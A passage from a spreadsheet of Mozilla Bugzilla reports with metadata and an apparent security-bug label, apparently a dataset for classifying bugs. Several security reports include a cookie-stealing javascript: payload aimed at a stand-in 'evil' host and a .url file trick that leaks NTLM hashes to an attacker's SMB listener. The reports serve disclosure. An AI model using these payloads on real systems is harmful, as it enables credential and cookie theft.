With Mozilla 1.3 or recent trunk: 
  error message "Document contains no data"
Expected behaviour:
  The connection should succeed
The connection works after one disables TLS, forcing PSM not to use TLS.</t>
        </is>
      </c>
      <c r="X5308" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5309">
      <c r="A5309" t="n">
        <v>137771</v>
      </c>
      <c r="B5309" t="inlineStr">
        <is>
          <t>2002-04-16 08:25:53 -0700</t>
        </is>
      </c>
      <c r="C5309" t="inlineStr">
        <is>
          <t>downcase element and attribute names and quote attribute values</t>
        </is>
      </c>
      <c r="D5309" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:29 -0800</t>
        </is>
      </c>
      <c r="E5309" t="n">
        <v>1</v>
      </c>
      <c r="F5309" t="n">
        <v>1</v>
      </c>
      <c r="G5309" t="n">
        <v>4</v>
      </c>
      <c r="H5309" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5309" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5309" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K5309" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L5309" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5309" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5309" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5309" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5309" t="inlineStr"/>
      <c r="Q5309" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5309" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5309" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5309" t="n">
        <v>1</v>
      </c>
      <c r="U5309" t="n">
        <v>0</v>
      </c>
      <c r="V5309" t="n">
        <v>10</v>
      </c>
      <c r="W5309" t="inlineStr">
        <is>
          <t>Bugzilla should be as close to XHTML as possible without breaking HTML 4.01
Transitional.  Elements should be lowercase and attributes should be quoted.</t>
        </is>
      </c>
      <c r="X5309" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5310">
      <c r="A5310" t="n">
        <v>460090</v>
      </c>
      <c r="B5310" t="inlineStr">
        <is>
          <t>2008-10-15 11:59:37 -0700</t>
        </is>
      </c>
      <c r="C5310" t="inlineStr">
        <is>
          <t>Firefox crashes (segfault) on attempting to view XSL Transform (xml file with linked xsl) [ txMozillaXSLTProcessor::TransformToDoc ]</t>
        </is>
      </c>
      <c r="D5310" t="inlineStr">
        <is>
          <t>2011-03-10 23:47:19 -0800</t>
        </is>
      </c>
      <c r="E5310" t="n">
        <v>1</v>
      </c>
      <c r="F5310" t="n">
        <v>1</v>
      </c>
      <c r="G5310" t="n">
        <v>3</v>
      </c>
      <c r="H5310" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5310" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5310" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K5310" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L5310" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5310" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5310" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5310" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P5310" t="inlineStr">
        <is>
          <t>[sg:dupe 485217]</t>
        </is>
      </c>
      <c r="Q5310" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5310" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5310" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5310" t="n">
        <v>1</v>
      </c>
      <c r="U5310" t="n">
        <v>0</v>
      </c>
      <c r="V5310" t="n">
        <v>20</v>
      </c>
      <c r="W5310" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008101315 Ubuntu/8.10 (intrepid) Firefox/3.0.3
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008101315 Ubuntu/8.10 (intrepid) Firefox/3.0.3
Opened from downstream https://bugs.launchpad.net/ubuntu/+source/firefox-3.0/+bug/253641.
Attempting to view http://launchpadlibrarian.net/16454122/test.xml causes a segfault, confirmed on multiple systems and multiple versions of Firefox. If the XSL is not linked, there is no problem, so it appears to be caused by the XSL.
Reproducible: Always
Steps to Reproduce:
1.Visit http://launchpadlibrarian.net/16454122/test.xml
Actual Results:  
Segfault.
Expected Results:  
No segfault. The XML should be displayed, applying the XSLT, or at least giving an error that it cannot be transformed.</t>
        </is>
      </c>
      <c r="X5310" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5311">
      <c r="A5311" t="n">
        <v>202917</v>
      </c>
      <c r="B5311" t="inlineStr">
        <is>
          <t>2003-04-22 10:52:16 -0700</t>
        </is>
      </c>
      <c r="C5311" t="inlineStr">
        <is>
          <t>[FIX]CSS anchors move when mouse overing them</t>
        </is>
      </c>
      <c r="D5311" t="inlineStr">
        <is>
          <t>2003-04-23 05:06:00 -0700</t>
        </is>
      </c>
      <c r="E5311" t="n">
        <v>1</v>
      </c>
      <c r="F5311" t="n">
        <v>1</v>
      </c>
      <c r="G5311" t="n">
        <v>3</v>
      </c>
      <c r="H5311" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5311" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5311" t="inlineStr">
        <is>
          <t>Layout: Block and Inline</t>
        </is>
      </c>
      <c r="K5311" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5311" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5311" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5311" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5311" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5311" t="inlineStr"/>
      <c r="Q5311" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5311" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5311" t="inlineStr">
        <is>
          <t>mozilla1.4beta</t>
        </is>
      </c>
      <c r="T5311" t="n">
        <v>1</v>
      </c>
      <c r="U5311" t="n">
        <v>0</v>
      </c>
      <c r="V5311" t="n">
        <v>11</v>
      </c>
      <c r="W5311" t="inlineStr">
        <is>
          <t>build ID: 2003042208 on Linux.
I don't think this is bug as I've never seen before on this page and I usually
look at it everyday. 20030421 build doesn't exhibit this problem.
Steps to reproduce:
1. Load http://www.nitot.com/standards/blog/
2. Mouse over a blog link, say 'nous indique" in April 22nd post at 3:12,
3. See the 'nous indique' being duplicated and moving at the beginning of the
sentence.</t>
        </is>
      </c>
      <c r="X5311" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5312">
      <c r="A5312" t="n">
        <v>719994</v>
      </c>
      <c r="B5312" t="inlineStr">
        <is>
          <t>2012-01-20 13:47:09 -0800</t>
        </is>
      </c>
      <c r="C5312" t="inlineStr">
        <is>
          <t>loads of principal-inheriting URIs (e.g. javascript:) on chrome-privileged pages (e.g. about:sessionstore) allows unexpected privilege escalation</t>
        </is>
      </c>
      <c r="D5312" t="inlineStr">
        <is>
          <t>2024-05-29 15:57:24 -0700</t>
        </is>
      </c>
      <c r="E5312" t="n">
        <v>1</v>
      </c>
      <c r="F5312" t="n">
        <v>1</v>
      </c>
      <c r="G5312" t="n">
        <v>3</v>
      </c>
      <c r="H5312" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5312" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5312" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5312" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5312" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5312" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5312" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5312" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5312" t="inlineStr">
        <is>
          <t>[sg:critical][qa!] fixed in bug 723808</t>
        </is>
      </c>
      <c r="Q5312" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5312" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5312" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T5312" t="n">
        <v>1</v>
      </c>
      <c r="U5312" t="n">
        <v>0</v>
      </c>
      <c r="V5312" t="n">
        <v>56</v>
      </c>
      <c r="W5312" t="inlineStr">
        <is>
          <t>Created attachment 590328
a crude PoC I used, will crash Firefox after restart
It is possible to trap user on a chrome privileged page with buttons leading to arbitrary code if a browser session is launched with a maliciously crafted homepage URI.
There are 2 things which combined may effectively prevent users from realizing they deal with a malicious link when they set their homepage by dropping an image on the home button:
1. Using DataTransfer, text/x-moz-url of the drag can be manipulated on the fly.
2. Firefox displays a misleading prompt after dropping a link on the home button -- it says that "this document" is being set as the homepage, which is incorrect.
Thus, the user has no way of knowing what URI will be set as homepage without inspecting the source. Unless they realize that both the status bar of the dragged image and the prompt message from the browser are misleading and go check the newly set home page in Options-&gt;General (instead of simply pressing the home button to see if it goes where expected), it can be leveraged by a malicious party in 2 ways:
1. Stealing cookies.
The obvious and not very interesting scenario -- javascript:Image().src='http://evil/'+encodeURI(document.cookie);location.href='http://theactualwebsite' will silently steal cookies of every website the user navigates away from by pressing the home button.
2. Code execution.
Here's a video demonstrating the concept: http://www.youtube.com/watch?v=xDmyWk58Xo4 (select fullscreen and 1080p for the optimal quality)
- The malicious website detects the draginit event of the icon and verifies that the desired URI landed on the homepage by probing an iframed javascript:window.home(), then it sets the cookie to schedule a crash in the next browsing session.
- When a new session is started, the website starts crashing the browser.
- After 2 crashes, the user is presented with about:sessionrestore and 2 options. If they decide to restore the session, Firefox will crash again and the user will return to about:sessionrestore. Trying to remove the home page tab from the list will disable the restore button. If they click the other button -- "start a new session" -- the javascript link will inherit chrome privileges from about:sessionrestore and an arbitrary code will be executed. Pressing the home button will execute the payload as well.
Seeing that this method of setting home page is fairly popular (several well known websites provide their drag icons) and it is a seemingly innocuous action, you may want to disallow setting URI_INHERITS_SECURITY_CONTEXT as a homepage -- unless you see a demand for using bookmarklets as homepages, it would be the easiest way to make this feature safe. Displaying the actual URI in the confirmation prompt would make it less prone to abuse, too.</t>
        </is>
      </c>
      <c r="X5312" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5313">
      <c r="A5313" t="n">
        <v>488995</v>
      </c>
      <c r="B5313" t="inlineStr">
        <is>
          <t>2009-04-18 09:43:07 -0700</t>
        </is>
      </c>
      <c r="C5313" t="inlineStr">
        <is>
          <t>Exploitable crash with watch and __defineSetter__ on nsIDOMSVGAnimatedLength::animVal</t>
        </is>
      </c>
      <c r="D5313" t="inlineStr">
        <is>
          <t>2009-11-19 12:20:55 -0800</t>
        </is>
      </c>
      <c r="E5313" t="n">
        <v>1</v>
      </c>
      <c r="F5313" t="n">
        <v>1</v>
      </c>
      <c r="G5313" t="n">
        <v>3</v>
      </c>
      <c r="H5313" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5313" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5313" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5313" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5313" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5313" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5313" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5313" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5313" t="inlineStr">
        <is>
          <t>[sg:critical] fixed-in-tracemonkey [found by "PenPal"]</t>
        </is>
      </c>
      <c r="Q5313" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5313" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5313" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5313" t="n">
        <v>1</v>
      </c>
      <c r="U5313" t="n">
        <v>0</v>
      </c>
      <c r="V5313" t="n">
        <v>35</v>
      </c>
      <c r="W5313" t="inlineStr">
        <is>
          <t>Created attachment 373489
exploit (no payload included)
I haven't had time to analyze this but I'm assured its exploitable and the underlying issue apparently is related to the watch method not SVG.  Please credit to "PenPal".</t>
        </is>
      </c>
      <c r="X5313" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5314">
      <c r="A5314" t="n">
        <v>597254</v>
      </c>
      <c r="B5314" t="inlineStr">
        <is>
          <t>2010-09-16 16:28:59 -0700</t>
        </is>
      </c>
      <c r="C5314" t="inlineStr">
        <is>
          <t>Persist OS and browser selections</t>
        </is>
      </c>
      <c r="D5314" t="inlineStr">
        <is>
          <t>2010-10-27 16:43:15 -0700</t>
        </is>
      </c>
      <c r="E5314" t="n">
        <v>1</v>
      </c>
      <c r="F5314" t="n">
        <v>1</v>
      </c>
      <c r="G5314" t="n">
        <v>5</v>
      </c>
      <c r="H5314" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5314" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5314" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K5314" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5314" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5314" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5314" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5314" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5314" t="inlineStr"/>
      <c r="Q5314" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5314" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5314" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T5314" t="n">
        <v>1</v>
      </c>
      <c r="U5314" t="n">
        <v>0</v>
      </c>
      <c r="V5314" t="n">
        <v>5</v>
      </c>
      <c r="W5314" t="inlineStr">
        <is>
          <t>If the user expressly chooses an OS or browser from the pop-up menu, persist it forever in a cookie, and obey it when loading a new page.</t>
        </is>
      </c>
      <c r="X5314" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5315">
      <c r="A5315" t="n">
        <v>257593</v>
      </c>
      <c r="B5315" t="inlineStr">
        <is>
          <t>2004-08-31 15:08:32 -0700</t>
        </is>
      </c>
      <c r="C5315" t="inlineStr">
        <is>
          <t>new charts requires login everytime a new dataset is added to list</t>
        </is>
      </c>
      <c r="D5315" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:41 -0800</t>
        </is>
      </c>
      <c r="E5315" t="n">
        <v>1</v>
      </c>
      <c r="F5315" t="n">
        <v>1</v>
      </c>
      <c r="G5315" t="n">
        <v>4</v>
      </c>
      <c r="H5315" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5315" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5315" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K5315" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5315" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5315" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5315" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5315" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5315" t="inlineStr"/>
      <c r="Q5315" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5315" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5315" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5315" t="n">
        <v>1</v>
      </c>
      <c r="U5315" t="n">
        <v>0</v>
      </c>
      <c r="V5315" t="n">
        <v>9</v>
      </c>
      <c r="W5315" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040207 Firefox/0.8
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040207 Firefox/0.8
If one is not logged in and visits the chart.cgi page directly it will prompt
for you to login.  That is fine.  Then everytime you attempt to add a new data
set to the list you are required to login before it will proceed.  This is not fun.
If I visit the report.cgi page first(it prompts for login), then click on the
chart.cgi link there than everything is fine.  Going that route it doesn't
prompt for a login on every dataset add.
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X5315" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5316">
      <c r="A5316" t="n">
        <v>1366992</v>
      </c>
      <c r="B5316" t="inlineStr">
        <is>
          <t>2017-05-23 02:16:36 -0700</t>
        </is>
      </c>
      <c r="C5316" t="inlineStr">
        <is>
          <t>Search highlight fill should match the spec</t>
        </is>
      </c>
      <c r="D5316" t="inlineStr">
        <is>
          <t>2017-05-25 06:23:05 -0700</t>
        </is>
      </c>
      <c r="E5316" t="n">
        <v>1</v>
      </c>
      <c r="F5316" t="n">
        <v>1</v>
      </c>
      <c r="G5316" t="n">
        <v>2</v>
      </c>
      <c r="H5316" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5316" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5316" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K5316" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L5316" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5316" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5316" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5316" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5316" t="inlineStr">
        <is>
          <t>[photon-preference]</t>
        </is>
      </c>
      <c r="Q5316" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5316" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5316" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T5316" t="n">
        <v>1</v>
      </c>
      <c r="U5316" t="n">
        <v>0</v>
      </c>
      <c r="V5316" t="n">
        <v>8</v>
      </c>
      <c r="W5316" t="inlineStr">
        <is>
          <t>Created attachment 8870347
highlight_fill.png
[Affected versions]: 
Nightly 55.0a1
[Affected platforms]:
Platforms: Windows 10 x 64, Mac OS X 10.12 and Ubuntu 16.04 x64.
[Steps to reproduce]:
1. Launch Firefox, go to about:config and search for "browser.preferences.search" and set it value to true.
2. Go to "about:preferences".
3. Using Inspect Element verify the fill of the search result highlights.
[Expected result]:
Search highlight fill should be: rgb(255, 233, 0) = #ffe900
[Actual result]:
Search highlight fill is: rgb(255, 227, 82) = #ffe352</t>
        </is>
      </c>
      <c r="X5316" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5317">
      <c r="A5317" t="n">
        <v>1784451</v>
      </c>
      <c r="B5317" t="inlineStr">
        <is>
          <t>2022-08-12 04:32:18 -0700</t>
        </is>
      </c>
      <c r="C5317" t="inlineStr">
        <is>
          <t>URL files on windows should be flagged as potentially malicious</t>
        </is>
      </c>
      <c r="D5317" t="inlineStr">
        <is>
          <t>2023-02-07 11:39:44 -0800</t>
        </is>
      </c>
      <c r="E5317" t="n">
        <v>1</v>
      </c>
      <c r="F5317" t="n">
        <v>1</v>
      </c>
      <c r="G5317" t="n">
        <v>3</v>
      </c>
      <c r="H5317" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5317" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5317" t="inlineStr">
        <is>
          <t>Safe Browsing</t>
        </is>
      </c>
      <c r="K5317" t="inlineStr">
        <is>
          <t>Firefox 103</t>
        </is>
      </c>
      <c r="L5317" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5317" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5317" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5317" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P5317" t="inlineStr"/>
      <c r="Q5317" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5317" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5317" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5317" t="n">
        <v>0</v>
      </c>
      <c r="U5317" t="n">
        <v>0</v>
      </c>
      <c r="V5317" t="n">
        <v>2</v>
      </c>
      <c r="W5317" t="inlineStr">
        <is>
          <t>Steps to reproduce:
1. Open a listener on port 445(smb) anywhere on the internet. A simple `ncat -lvp 445` is enough for obtaining a real IP address bypassing browser's proxy settings(impacts tor browser), although responder(https://github.com/lgandx/Responder) can also be used to grab more data about the user including arbitrary environment variables, the real username and the NTLM password hash.
2. Create a file with an url extension containing the following contents and host it anywhere on the web(replacing x.x.x.x with the ip of the listener created in the previous step).
```
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\x.x.x.x\%USERNAME%.icon
IconIndex=1
```
3. Download the file created in the previous step.
Actual results:
Firefox downloaded the file. If you were to open the downloads directory in windows file explorer it would send out a ping to the server containing a lot of potentially sensitive data.
Expected results:
Firefox should have flagged the file as potentially malicious and not downloaded it automatically even with `browser.download.always_ask_before_handling_new_types` set to false. 
This is the behavior of the chromium browser(https://bugs.chromium.org/p/chromium/issues/detail?id=335029)</t>
        </is>
      </c>
      <c r="X5317" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5318">
      <c r="A5318" t="n">
        <v>788822</v>
      </c>
      <c r="B5318" t="inlineStr">
        <is>
          <t>2012-09-05 14:46:34 -0700</t>
        </is>
      </c>
      <c r="C5318" t="inlineStr">
        <is>
          <t>Assertion failure: [infer failure] Missing type pushed 0: &lt;0x7f7d5aa09060&gt;, at jsinfer.cpp:328</t>
        </is>
      </c>
      <c r="D5318" t="inlineStr">
        <is>
          <t>2013-03-18 13:08:05 -0700</t>
        </is>
      </c>
      <c r="E5318" t="n">
        <v>1</v>
      </c>
      <c r="F5318" t="n">
        <v>1</v>
      </c>
      <c r="G5318" t="n">
        <v>3</v>
      </c>
      <c r="H5318" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5318" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5318" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5318" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5318" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5318" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5318" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5318" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5318" t="inlineStr">
        <is>
          <t>[ion:p1:fx19] [jsbugmon:origRev=fdfaef738a00][adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q5318" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5318" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5318" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T5318" t="n">
        <v>1</v>
      </c>
      <c r="U5318" t="n">
        <v>0</v>
      </c>
      <c r="V5318" t="n">
        <v>24</v>
      </c>
      <c r="W5318" t="inlineStr">
        <is>
          <t>The following testcase asserts on ionmonkey revision 0b296feed34c (run with --ion -n -m --ion-eager -a):
function TestCase(n, d, e, a)
  this.name = n;
function reportCompare (expected, actual, description) {
  var testcase = new TestCase("unknown-test-name", description, expected, actual);
}
evaluate("reportCompare(true,true);", { noScriptRval: true });
evaluate("( 2 , TestCase       ) ();", { noScriptRval: true });</t>
        </is>
      </c>
      <c r="X5318" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5319">
      <c r="A5319" t="n">
        <v>486269</v>
      </c>
      <c r="B5319" t="inlineStr">
        <is>
          <t>2009-04-01 00:41:20 -0700</t>
        </is>
      </c>
      <c r="C5319" t="inlineStr">
        <is>
          <t>Race condition [@ NPObjWrapper_NewResolve] while accessing the private data of an NPObject JS wrapper class object</t>
        </is>
      </c>
      <c r="D5319" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E5319" t="n">
        <v>1</v>
      </c>
      <c r="F5319" t="n">
        <v>1</v>
      </c>
      <c r="G5319" t="n">
        <v>6</v>
      </c>
      <c r="H5319" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5319" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5319" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K5319" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5319" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5319" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5319" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5319" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5319" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5319" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5319" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5319" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T5319" t="n">
        <v>1</v>
      </c>
      <c r="U5319" t="n">
        <v>0</v>
      </c>
      <c r="V5319" t="n">
        <v>29</v>
      </c>
      <c r="W5319" t="inlineStr">
        <is>
          <t>From Secunia:
-----------------
Hi guys,
A long time ago, I noticed a vulnerability in Firefox 2.x when loading
Java applets. Before getting around to reporting it, it was fixed (and
still looks fixed). However, a similar problem seems to have been
introduced in Firefox 3.x.
The vulnerability is caused due to a race condition in xul.dll while
accessing the private data of an NPObject JS wrapper class object when
navigating away from a web page during loading of a Java applet. This
can be exploited via a specially crafted web page to use already freed
memory.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is confirmed in Firefox 3.0.7 for Windows with Java
JRE 6 Update 13 including npjp2.dll version 6.0.130.3. Other versions
may also be affected.
Exploitation:
-------------
Secunia Research has created a PoC, which is available upon request.
The vulnerability can also be reproduced quite simply by accessing a
web page loading a java applet and navigate away from it (e.g. using
the "Back" button) before the applet is loaded.
As an example, do the following:
1) Navigate to:
http://secunia.com/vulnerability_scanning/online/
2) Click the "Start Scanner" button.
3) Immediately click the back button before the applet is loaded.
4) After hanging for a couple of seconds, the browser should crash.
NOTE: In most cases zeroed memory is used, thus only causing a crash.
However, it has been proven that it is possible to write to the memory
before it is re-used.
Closing comments:
-----------------
We have assigned this vulnerability Secunia advisory SA34241, but have
not assigned a CVE identifier from our CNA pool. Please do so from your
pool.
A preliminary disclosure date of 2009-04-08 10am CET has been set where
the details will be publicly disclosed. However, we are naturally
prepared to push the disclosure date if you need more time to address
the vulnerability.
Please acknowledge receiving this e-mail and let us know when you
expect to fix the vulnerability.
Credits should go to:
Jakob Balle and Carsten Eiram, Secunia Research.
If this qualifies for your bug bounty, then please keep the money and
spend it on beers for the developers instead.
Also, if you have any questions, then please don't hesitate to contact
me.
-----------------
This bug needs a better summary...</t>
        </is>
      </c>
      <c r="X5319" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5320">
      <c r="A5320" t="n">
        <v>1151523</v>
      </c>
      <c r="B5320" t="inlineStr">
        <is>
          <t>2015-04-06 10:22:06 -0700</t>
        </is>
      </c>
      <c r="C5320" t="inlineStr">
        <is>
          <t>XSS while editing in MDN</t>
        </is>
      </c>
      <c r="D5320" t="inlineStr">
        <is>
          <t>2024-05-30 09:00:10 -0700</t>
        </is>
      </c>
      <c r="E5320" t="n">
        <v>1</v>
      </c>
